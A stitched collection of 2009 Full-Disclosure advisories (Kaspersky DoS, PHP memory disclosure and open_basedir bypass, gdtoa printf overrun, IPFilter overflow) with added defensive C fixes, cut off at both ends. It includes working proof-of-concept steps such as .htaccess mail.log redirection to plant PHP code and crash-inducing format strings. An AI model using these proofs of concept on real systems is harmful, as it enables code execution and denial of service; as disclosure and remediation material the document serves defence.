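    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;
        for (;;) {                                 /* flags: =f ^ + ( ! - */
            if (*p == '=') { if (p[1] == '\0') return -1; p += 2; }
            else if (*p && strchr("^+(!-", *p)) p++;
            else break;
        }
        int w = 0, left = 0, right = 0;
        if (read_num(&p, &w) != 0 || w > MAX_FIELD) return -1;
        if (*p == '#') { p++; if (read_num(&p, &left) != 0 || left > MAX_FIELD) return -1; }
        if (*p == '.') { p++; if (read_num(&p, &right) != 0 || right > MAX_FIELD) return -1; }
        if (*p != 'i' && *p != 'n') return -1;     /* unknown or missing conversion */
    }
    return 0;
}

/* strfmon with the guard in front. Returns the length written, or -1 with
 * errno = EINVAL when the format is refused (or strfmon's own -1). */
ssize_t safe_strfmon(char *buf, size_t len, const char *fmt, double amount)
{
    if (strfmon_format_ok(fmt) != 0) { errno = EINVAL; return -1; }
    return strfmon(buf, len, fmt, amount);
}

int main(void)
{
    const char *tests[] = { "%.2n", "%=*#10.2i", "%.1073741821i", "%.77715949976712904702i" };
    char buf[128];
    setlocale(LC_ALL, "C");
    for (size_t i = 0; i < sizeof tests / sizeof tests[0]; i++) {
        ssize_t n = safe_strfmon(buf, sizeof buf, tests[i], 1234.5);
        printf("%-28s -> %s\n", tests[i], n < 0 ? "refused" : buf);
    }
    return 0;
}
```

The two crashing formats from the gdb sessions above are both refused: 1073741821 is a valid int but far above MAX_FIELD, and 77715949976712904702 is caught by read_num() before it is even compared.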

[Full-disclosure] Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service

2009-08-19 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
[ Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 19.08.2009

Risk: Medium

Affected Software (tested):
- - Kaspersky Internet Security 2010 9.0.0.459 (a) EN
- - Kaspersky Anti-Virus 2010 9.0.0.463 DE

Original URL:
http://securityreason.com/achievement_securityalert/66


- --- 0.Description ---
Kaspersky Lab is a computer security company, co-founded by Natalia
Kasperskaya and Eugene Kaspersky in 1997, offering anti-virus,
anti-spyware, anti-spam, and anti-intrusion products. Kaspersky Lab is a
privately held company headquartered in Moscow, Russia with regional
offices in Germany, France, the Netherlands, the UK, Poland, Romania,
Sweden, Japan, China, Korea and the USA.

- --- 1. Kaspersky AV/IS 2010 avp.exe Denial of Service ---
The main problem exists in parsing URL addresses. If we give a lot of
dots, the Kaspersky avp.exe process will get 100% of CPU and will block
traffic via browsers.
The relative time to return to normal behavior is very long. In
practice, when we give a large number of dots, Kaspersky will not return
to normal behavior.

This example will deny access to the browser and other Kaspersky
operations

http://lu.cxib.net/.[ .xY where 1024http://lu.cxib.net/..[ more dots ]">

The user who executed the code above will be deprived of the
possibility of browsing, and Kaspersky will be reset successively.

Tested on:
- - Kaspersky Internet Security 2010 9.0.0.459 (a) (EN) + Windows Vista
Enterprise (EN)
- - Kaspersky Anti-Virus 2010 9.0.0.463 (DE) + Windows XP Home Edition (DE)

The 0day (18.08.2009) exploit can be found at:

http://securityreason.com/downloads/kaspersky.2010.dos.html

This script will generate tags with different URL lengths to block
Kaspersky services.

However, we can also exploit this issue via HTML email. The method of
attack is simple. The victim need only refer to a faulty address.

- --- 2. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 3. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d0t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.pl/

- --
Best Regards,
- 
pub   1024D/A6986BD6 2008-08-22
uid  Maksymilian Arciemowicz (cxib)

sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-BEGIN PGP SIGNATURE-
 
iEYEARECAAYFAkqLQqIACgkQpiCeOKaYa9aLxgCgy3FzzR5xPzU6QgoK1VpHpjur
paQAn3ku0sU5AzHjzjo3N0qq+Kywu7i1
=rQAP
-END PGP SIGNATURE-


[Full-disclosure] SECURITYREASON: PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

2009-08-08 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 10.07.2009
- - - Pub.: 06.08.2009

Risk: High

Affected Software:
- - - PHP 5.3.0
- - - PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore - Restores the value of a configuration option

ini_restore  ( string $varname  )

- - --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exists in restoring PHP config environments. To
demonstrate the problem, we need to declare variables via the ini_set()
function. When we then use ini_restore(), variables in PG() will point
to an arbitrary part of memory.

- - ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage TSRMLS_DC) /* {{{ */
{
    if (ini_entry->modified) {
        if (ini_entry->on_modify) {
            zend_try {
                /* even if on_modify bails out, we have to continue on with restoring,
                   since there can be allocated variables that would be freed on MM shutdown
                   and would lead to memory corruption later ini entry is modified again */
                ini_entry->on_modify(ini_entry, ini_entry->orig_value, ini_entry->orig_value_length,
                                     ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3,
                                     stage TSRMLS_CC);
            } zend_end_try();
        }
        if (ini_entry->value != ini_entry->orig_value) {
            efree(ini_entry->value);
        }
        ini_entry->value = ini_entry->orig_value;
        ini_entry->value_length = ini_entry->orig_value_length;
        ini_entry->modified = 0;
        ini_entry->orig_value = NULL;
        ini_entry->orig_value_length = 0;
        if (ini_entry->modifiable >= (1 << 3)) {
            ini_entry->modifiable >>= 3;
        }
    }
    return 0;
}
- - ---zend_ini.c---

The modified flag will be reset, and we can no longer consider the
variable modified. The return value of ini_entry->on_modify() is not
checked, and PG() will now be out of the memory range.

To demonstrate this issue

- - ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul  5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php

127# php /var/www/www/sess.php AAA
PHP Warning:  session_start():
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning:  Unknown:
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning:  Unknown: Failed to write session data (files). Please
verify that the current setting of session.save_path is correct ($­|ma:
no-cache) in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning:  session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed:
No such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning:  Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed:
No such file or directory (2) in Unknown on line 0
PHP Warning:  Unknown: Failed to write session data (files). Please
verify that the current setting of session.save_path is correct (¤^j|ma:
no-cache) in Unknown on line 0
- - ---example0 (5.2.10/5.3.0)---

The main problem starts in ini_restore("session.save_path"). To show
this issue, we need to use some function with PG() inside (like
session_start()).

- - ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies
127# cat /www/file.php


127# php /www/file.php
PHP Warning:  include(): open_basedir restriction in effect. File(B) is
not within the allowed path(s): (4?e»X?p») in /www/file.php on line 7

Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line 7
PHP Warning:  include(B): failed to open stream: Operation not permitted
in /www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning:  include(): Failed opening 'B' for inclusion
(include_path='.:/

[Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass

2009-08-08 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ PHP 5.3.0 (main.c) open_basedir bypass ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 26.05.2009
- - - Pub.: 06.08.2009

Risk: Medium

Affected Software:
PHP 5.3.0

Original URL:
http://securityreason.com/achievement_securityalert/64

- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/mail.configuration.php

mail.log  NULL  PHP_INI_SYSTEM|PHP_INI_PERDIR  Available since PHP 5.3.0.


- - --- 1. PHP 5.3.0 (main.c) open_basedir bypass ---
The first issue exists in main/main.c

- - ---
STD_PHP_INI_ENTRY("mail.log", NULL, PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateString, mail_log, php_core_globals, core_globals)
- - ---

Access PHP_INI_PERDIR is accepted from .htaccess (Apache) or .user.ini
(CGI). The function OnUpdateString doesn't check open_basedir. To
resolve this, we need to create a new function, OnUpdateMailLog, where
open_basedir will be checked.

Exploit:
127# cat /www/home/cx/show.php

127# curl http://localhost/home/cx/show.php
/www/home/cx
127# cat /www/home/cx/set.php

127# curl http://localhost/home/cx/set.php

Warning: ini_set(): open_basedir restriction in effect.
File(/www/home/gpkc/tmp/) is not within the allowed path(s):
(/www/home/cx) in /www/home/cx/set.php on line 2

We need create .htaccess or .user.ini
for Apache SAPI:
127# echo 'php_value mail.log /www/home/gkpc/tmp/exploit.php' > ./.htaccess

for CGI:
127# echo 'mail.log = /www/home/gkpc/tmp/exploit.php' > ./.user.ini

and some file with a mail() call inside. In the X-Mailer header we can
put some PHP code to be executed in the other open_basedir range, like:


127# cat /www/home/cx/runmail.php
<?php
$to = 's...@spam.c0m';                 /* recipient as printed in the mail.log line below */
$subject = 'http://securityreason.com';
$message = 'exploit';
$headers = 'From: s...@spam.c0m' . "\r\n" .
'Reply-To: s...@spam.c0m' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);
?>

127# curl http://localhost/home/cx/runmail.php
127# ls -la /www/home/gkpc/tmp/exploit.php
-rw-r--r--  1 www  www  173 Jun 30 05:20 /www/home/gkpc/tmp/exploit.php

Finish!
Now we can execute the evil script exploit.php via httpd.

127# curl http://localhost/home/gkpc/tmp/exploit.php
mail() on [/www/home/cx/runmail.php:9]: To: s...@spam.c0m -- Headers:
From: s...@spam.c0m  Reply-To: s...@spam.c0m  X-Mailer:
PHP/www/home/gkpc/5.3.0

exploit.php is now in open_basedir=/www/home/gkpc/ range.

--- 2. Fix ---
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

--- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

--- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t>com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
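The check the advisory above says OnUpdateString lacks, written out as an added example in C; it is not part of the advisory and not PHP's own source. It implements a lexical open_basedir test over PHP's colon-separated allow-list and an ini_path_update_allowed() wrapper of the kind an OnUpdateMailLog handler would call before accepting a mail.log value from .htaccess or .user.ini. The function names, the PATH_MAX_LEN bound and the sample paths in main() are this example's own; it collapses "." / ".." / "//" but does not call realpath(), so a real handler must still resolve symlinks first.

```c
/* Added example, not PHP's code: the open_basedir check that a
 * PHP_INI_PERDIR path directive (mail.log, error_log) needs before a
 * value from .htaccess or .user.ini is accepted. Lexical only: it
 * collapses "." / ".." / "//" but does not resolve symlinks, so a real
 * handler must realpath() the candidate before calling this. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 1024   /* this example's own bound, not a PHP constant */

/* Collapse "/a/./b//../c/" into "/a/c". Rejects relative paths and
 * anything that does not fit in out. */
static bool normalize_path(const char *in, char *out, size_t outsz)
{
    if (in == NULL || in[0] != '/' || outsz < 2)
        return false;
    size_t len = 0;                 /* out[0..len) holds "/seg/seg" */
    const char *p = in;
    while (*p) {
        while (*p == '/')
            p++;
        if (*p == '\0')
            break;
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        size_t seglen = (size_t)(p - seg);
        if (seglen == 1 && seg[0] == '.')
            continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            /* pop the previous component; ".." above root stays at root */
            while (len > 0 && out[len - 1] != '/')
                len--;
            if (len > 0)
                len--;
            continue;
        }
        if (len + 1 + seglen + 1 > outsz)
            return false;
        out[len++] = '/';
        memcpy(out + len, seg, seglen);
        len += seglen;
    }
    if (len == 0)
        out[len++] = '/';
    out[len] = '\0';
    return true;
}

/* open_basedir is a ':'-separated list of directories. A path passes if,
 * after normalization, it equals one entry or lies beneath it on a
 * component boundary: "/www/home/cx" must not admit "/www/home/cxfoo". */
bool path_within_basedir(const char *path, const char *basedir_list)
{
    char np[PATH_MAX_LEN], nb[PATH_MAX_LEN], raw[PATH_MAX_LEN];
    if (!normalize_path(path, np, sizeof np))
        return false;
    const char *entry = basedir_list;
    while (entry != NULL && *entry != '\0') {
        const char *end = strchr(entry, ':');
        size_t elen = end ? (size_t)(end - entry) : strlen(entry);
        if (elen < sizeof raw) {
            memcpy(raw, entry, elen);
            raw[elen] = '\0';
            if (normalize_path(raw, nb, sizeof nb)) {
                size_t blen = strlen(nb);
                if (strcmp(nb, "/") == 0)
                    return true;
                if (strncmp(np, nb, blen) == 0 &&
                    (np[blen] == '\0' || np[blen] == '/'))
                    return true;
            }
        }
        entry = end ? end + 1 : NULL;
    }
    return false;
}

/* What an OnUpdateMailLog-style handler should do instead of OnUpdateString:
 * keep the default for an empty value, otherwise admit the path only when it
 * is inside open_basedir. A relative value is rejected outright here because
 * its meaning depends on the request's working directory. */
bool ini_path_update_allowed(const char *value, const char *open_basedir)
{
    if (value == NULL || *value == '\0')
        return true;
    if (open_basedir == NULL || *open_basedir == '\0')
        return true;            /* no restriction configured */
    return path_within_basedir(value, open_basedir);
}

int main(void)
{
    const char *basedir = "/www/home/cx";         /* the restriction in the advisory */
    const char *candidates[] = {                  /* constructed sample values */
        "/www/home/gkpc/tmp/exploit.php",         /* the .htaccess mail.log value */
        "/www/home/cx/../gkpc/tmp/exploit.php",
        "/www/home/cxfoo/mail.log",
        "/www/home/cx/logs/mail.log",
    };
    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++)
        printf("%-40s %s\n", candidates[i],
               ini_path_update_allowed(candidates[i], basedir) ? "allowed" : "rejected");
    return 0;
}
```

The component-boundary test is the part most often got wrong when this check is reimplemented: a plain prefix comparison of "/www/home/cx" would admit "/www/home/cxfoo", and an unnormalized comparison would admit the "../" form of the advisory's path.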


[Full-disclosure] SecurityReason: Multiple Vendors libc/gdtoa printf(3) Array Overrun

2009-06-26 Thread Maksymilian Arciemowicz

[ Multiple Vendors libc/gdtoa printf(3) Array Overrun ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
Dis.: 07.05.2009
Pub.: 25.06.2009

CVE: CVE-2009-0689
Risk: High

Affected Software (12.06.2009):
- OpenBSD 4.5
- NetBSD 5.0
- FreeBSD 7.2/6.4

Original URL:
http://securityreason.com/achievement_securityalert/63


--- 0. Description ---
A week after the release of the new OpenBSD and NetBSD versions, our research
team checked the new implementation of gdtoa

http://openbsd.org/45.html

---
A new version of the gdtoa code has been integrated, bringing better C99
support to printf(3) and friends.
---

More:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/

--- 1. Multiple Vendors libc/gdtoa printf(3) Array Overrun ---
The main problem exists in new dtoa implementation.

asprintf(3) will crash for asprintf(ssij, "%0.262159f",x)

where x != 0

the behavior is correct for 262158

Let's see:

(gdb) r
Starting program: /cxib/C/check
Program received signal SIGSEGV, Segmentation fault.
0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
(gdb) bt
#0  0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
#1  0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12
#2  0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12
#3  0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12
#4  0xbbb882e1 in asprintf () from /usr/lib/libc.so.12
#5  0x08048706 in main () at check.c:6

Let's see src/lib/libc/gdtoa/gdtoaimp.h
---gdtoaimp.h---
...
#define Kmax 15
...
---gdtoaimp.h---

The maximum Kmax is 15. If we give a bigger value, like 17 (edi), the
program will overrun the freelist array. bss will have 0x1.

Correct reason (by NetBSD):
---gdtoaimp.h---
...
#define Kmax (sizeof(size_t) << 3)
...
---gdtoaimp.h---

What is wrong? This program will crash in
--- src/lib/libc/gdtoa/misc.c ---
if ( (rv = freelist[k]) !=0) {
        freelist[k] = rv->next;
}
else {
        x = 1 << k;
#ifdef Omit_Private_Memory
        rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));
#else
        len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1)
                /sizeof(double);
        if ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem) {
                rv = (Bigint*)(void *)pmem_next;
                pmem_next += len;
        }
        else
                rv = (Bigint*)MALLOC(len*sizeof(double));
#endif
        if (rv == NULL)
                return NULL;
        rv->k = k;
        rv->maxwds = x;
}
--- src/lib/libc/gdtoa/misc.c ---

here

rv->k = k;

or

freelist[k] = rv->next;

A good example to show this issue is printf(1) program.

127# printf %1.262159f 1.1
Memory fault (core dumped)

127# printf %11.210999f
210911999111791199.510001001

esi = 0x12
edi = 0x1d

127# printf %11.200999f
220911999111791199.510001001

esi = 0x13
edi = 0x1d

We can manipulate the esi register.

127# printf %11.200999f
1267686681.10001

Program received signal SIGSEGV, Segmentation fault.
__Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59
59  freelist[k] = rv->next;
(gdb) i r
eax            0x20efdb04   552590084
ecx            0x77ce2a9d   201029
edx            0x0          0
ebx            0x20eff654   552597076
esp            0xcfbfc2b0   0xcfbfc2b0
ebp            0xcfbfc2c8   0xcfbfc2c8
esi            0x41414141   1094795585
edi            0x1d         29
eip            0xf59317     0xf59317
eflags         0x10206      66054
cs             0x2b         43
ss             0x33         51
ds             0x33         51
es             0x33         51
fs             0x33         51
gs             0x33         51

esi = 0x41414141
edi = 0x1d

1267686681 is value of esi reg.

program will crash in

freelist[k] = rv->next;

Example 0:
--- chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
--- chujwamwmuzg.pl ---

Perl will crash with
esi = 0x41414141
edi = 0x15

Example 1:
127# php -r 'money_format("%0.262159n", 1.);'
Memory fault (core dumped)

Programs that allow you to enter/control the format string are vulnerable.
We believe that the OpenBSD source tree has only printf(1) and perl(1)
affected.

Functions like printf(3), strfmon(3), fprintf(3), sprintf(3),
snprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3),
vsnprintf(3), vasprintf(3) and others are vulnerable (with the new gdtoa impl.).
Other languages are also affected (printf in perl).

--- 2. Fix ---
NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gd
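The arithmetic behind the 262158/262159 boundary in the advisory above, as an added example in C that is neither the gdtoa code nor the NetBSD fix. It mirrors the sizing loop of gdtoa's rv_alloc() and the mode-3 (%f) buffer request of dtoa, then shows a Balloc() that refuses an out-of-range k instead of indexing freelist[] with it. BIGINT_OVERHEAD_I386 is an assumption: the 32-bit Bigint layout (sizeof(Bigint) 24, ULong 4, int 4) matching the i386 crash shown; on other ABIs the threshold precision differs. The function names, the cap of 28 in balloc_checked() and the header-only Bigint are this example's own. With these constants the model gives k = 17 for precision 262159, the edi value in the advisory, and k = 16 for 262158, which is already one slot past freelist[15]; the advisory reports only the former crashing.

```c
/* Added example, not the gdtoa or libc code: the size arithmetic that
 * turns a printf(3) precision into the Balloc() freelist index k, and
 * the bound check the NetBSD fix adds. BIGINT_OVERHEAD_I386 assumes the
 * 32-bit Bigint layout (sizeof(Bigint) 24, ULong 4, int 4) of the i386
 * crash in the advisory; other ABIs give other thresholds. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define KMAX_OLD 15                              /* gdtoaimp.h before the fix */
#define KMAX_NEW ((int)(sizeof(size_t) << 3))    /* NetBSD fix */
#define BIGINT_OVERHEAD_I386 16u                 /* sizeof(Bigint)-sizeof(ULong)-sizeof(int) */
#define SIZEOF_ULONG 4u

/* Mirror of gdtoa's rv_alloc() loop: freelist index for an i-byte digit buffer. */
int rv_alloc_k(unsigned i)
{
    int k = 0;
    for (unsigned j = SIZEOF_ULONG; BIGINT_OVERHEAD_I386 + j <= i; j <<= 1)
        k++;
    return k;
}

/* For "%.<prec>f" (dtoa mode 3) the request is ndigits + decexp + 1, decexp
 * being the decimal exponent of the value (0 for 1 <= x < 10), minimum 1. */
int dtoa_mode3_k(unsigned prec, int decexp)
{
    long i = (long)prec + decexp + 1;
    if (i <= 0)
        i = 1;
    return rv_alloc_k((unsigned)i);
}

/* True when the unfixed Balloc() would index past freelist[KMAX_OLD]. */
bool overruns_old_freelist(int k)
{
    return k < 0 || k > KMAX_OLD;
}

/* Hardened Balloc(): refuse an out-of-range k instead of indexing with it.
 * Only the header is modelled; the real Bigint carries 1<<k ULongs of digits. */
typedef struct Bigint {
    struct Bigint *next;
    int k, maxwds;
} Bigint;

static Bigint *freelist[KMAX_NEW + 1];

Bigint *balloc_checked(int k)
{
    if (k < 0 || k > KMAX_NEW || k > 28)    /* 28: keep the model's allocation small */
        return NULL;
    Bigint *rv = freelist[k];
    if (rv != NULL) {
        freelist[k] = rv->next;
        return rv;
    }
    rv = malloc(sizeof *rv + ((size_t)1 << k) * SIZEOF_ULONG);
    if (rv == NULL)
        return NULL;
    rv->next = NULL;
    rv->k = k;
    rv->maxwds = 1 << k;
    return rv;
}

void bfree_checked(Bigint *v)
{
    if (v != NULL) {
        v->next = freelist[v->k];
        freelist[v->k] = v;
    }
}

int main(void)
{
    const unsigned precs[] = { 262158, 262159 };  /* the two precisions in the advisory */
    for (size_t i = 0; i < sizeof precs / sizeof precs[0]; i++) {
        int k = dtoa_mode3_k(precs[i], 0);         /* x = 1.1: decimal exponent 0 */
        printf("%%0.%uf -> k = %d (%s)\n", precs[i], k,
               overruns_old_freelist(k) ? "past freelist[15]" : "in range");
    }
    Bigint *b = balloc_checked(17);
    printf("balloc_checked(17): %s\n", b ? "allocated" : "rejected");
    bfree_checked(b);
    return 0;
}
```

The point of the check is that k is derived from caller-controlled digits, so the freelist index must be bounded where it is used, not assumed from the format-string grammar; the fix's Kmax of sizeof(size_t) << 3 makes the array large enough for any k the sizing loop can produce on that platform.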

[Full-disclosure] IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow

2009-05-22 Thread Maksymilian Arciemowicz

[ IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com/

Date:
Dis.: 05.03.2009
Pub.: 22.05.2009

CVE: CVE-2009-1476
Risk: Low

Original URL:
http://securityreason.com/achievement_securityalert/62

--- 0. Description ---
IPFilter is a software package that can be used to provide network
address translation (NAT) or firewall services. To use, it can either be
used as a loadable kernel module or incorporated into your UNIX kernel;
use as a loadable kernel module where possible is highly recommended.
Scripts are provided to install and patch system files, as required.

ippool - user interface to the IPFilter pools

Ippool is used to manage information stored in the IP pools subsystem of
IPFilter. Configuration file information may be parsed and loaded into
the kernel, currently configured pools removed or changed as well as
inspected.

--- 1. IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ---
The main problem exists in lib/load_http.c.

Let's see lib/load_http.c ( char buffer[1024] )

---
...
alist_t *
load_http(char *url)
{
  int fd, len, left, port, endhdr, removed;
  char *s, *t, *u, buffer[1024], *myurl;
  alist_t *a, *rtop, *rbot;
  struct sockaddr_in sin;
  struct hostent *host;

  /*
   * More than this would just be absurd.
   */
  if (strlen(url) > 512) {
  fprintf(stderr, "load_http has a URL > 512 bytes?!\n");
  return NULL;
  }

  fd = -1;
  rtop = NULL;
  rbot = NULL;

  sprintf(buffer, "GET %s HTTP/1.0\r\n", url);

  myurl = strdup(url);
  if (myurl == NULL)
  goto done;

  s = myurl + 7;/* http:// */
  t = strchr(s, '/');
  if (t == NULL) {
  fprintf(stderr, "load_http has a malformed URL '%s'\n", url);
  free(myurl);
  return NULL;
  }
  *t++ = '\0';

  u = strchr(s, '@');
  if (u != NULL)
  s = u + 1;/* AUTH */

  sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s);
...
---

0. buffer[] have only 1024 bytes,
1. url can't have more than 512 bytes,
2. url will be copied into buffer here:

sprintf(buffer, "GET %s HTTP/1.0\r\n", url);

and here (s is a host)

sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s);

so if the URL is

512 = strlen(http:// A x504 /)

then the following is put into buffer:

strlen(GET  HTTP/1.0\r\n) = 15
strlen(url) = 512
strlen(Host: \r\n\r\n) = 10
strlen(A x504) = 504

sum = 1041 bytes.

Any use of this function is a potential risk. Programs such as "ippool"
may be at risk.

--- 2. Fix ---
NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/dist/ipf/lib/load_http.c?only_with_tag=MAIN
--- 3. Greets ---
Christos Zoulas

sp3x infospec chujwamwdupe pi3 and others

--- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl



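A bounded replacement for the two sprintf() calls in load_http(), as an added example in C that is not the IPFilter code. It parses the URL the same way the advisory's excerpt does (skip "http://", host ends at the first '/', drop any user@ prefix) but returns the size the request needs instead of writing past the buffer, and reproduces the 1041-byte worst case worked out above. The function names, the 4096-byte scratch buffer in request_fits() and the constructed URL are this example's own.

```c
/* Added example, not the IPFilter code: a bounded replacement for the two
 * sprintf() calls in load_http(), with the length accounting the advisory
 * spells out. It parses the URL the same way (skip "http://", host ends at
 * the first '/', drop any user@ prefix) but returns the size the request
 * needs instead of writing past the buffer. Names are this example's own. */
#include <stdio.h>
#include <string.h>

#define URL_LIMIT 512       /* same cap load_http() applies to the URL */

/* Returns the request length excluding the NUL (snprintf semantics), or -1
 * for a malformed URL. The request is usable only if the value is below bufsz. */
int build_http_get(const char *url, char *buf, size_t bufsz)
{
    if (strlen(url) > URL_LIMIT || strncmp(url, "http://", 7) != 0)
        return -1;
    const char *host = url + 7;
    const char *path = strchr(host, '/');
    if (path == NULL)
        return -1;
    const char *at = memchr(host, '@', (size_t)(path - host));
    if (at != NULL)
        host = at + 1;                      /* strip user[:pass]@, as load_http() does */
    int hostlen = (int)(path - host);
    /* snprintf reports the untruncated length, which is the number the
     * original never computed before the second sprintf() appended Host:. */
    return snprintf(buf, bufsz, "GET %s HTTP/1.0\r\nHost: %.*s\r\n\r\n",
                    url, hostlen, host);
}

/* Would the request for url fit in a buffer of bufsz bytes, NUL included? */
int request_fits(const char *url, size_t bufsz)
{
    char tmp[4096];
    if (bufsz > sizeof tmp)
        bufsz = sizeof tmp;
    int need = build_http_get(url, tmp, bufsz);
    return need >= 0 && (size_t)need < bufsz;
}

/* The advisory's worst case: "http://" + 504 'A' + "/" = 512 bytes. */
size_t worst_case_url(char *out, size_t outsz)
{
    if (outsz < URL_LIMIT + 1)
        return 0;
    memcpy(out, "http://", 7);
    memset(out + 7, 'A', 504);
    out[511] = '/';
    out[512] = '\0';
    return strlen(out);
}

int main(void)
{
    char url[URL_LIMIT + 1], buffer[1024];   /* 1024: the original stack buffer */
    worst_case_url(url, sizeof url);
    int need = build_http_get(url, buffer, sizeof buffer);
    printf("request needs %d bytes + NUL, buffer holds %zu: %s\n", need, sizeof buffer,
           (size_t)need < sizeof buffer ? "fits" : "would overflow");
    return 0;
}
```

The 512-byte URL cap in the original is not wrong in itself; it is just not the number that bounds the buffer, because the host appears in the request a second time. Sizing from the formatted output, as snprintf's return value does, removes the need to keep that arithmetic in step with the format string.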

[Full-disclosure] PHP 5.2.9 curl safe_mode & open_basedir bypass

2009-04-11 Thread Maksymilian Arciemowicz

[ PHP 5.2.9 curl safe_mode & open_basedir bypass ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
Dis.: 31.12.2008
Pub.: 10.04.2009

Original URL:
http://securityreason.com/achievement_securityalert/61

--- 0. Description ---
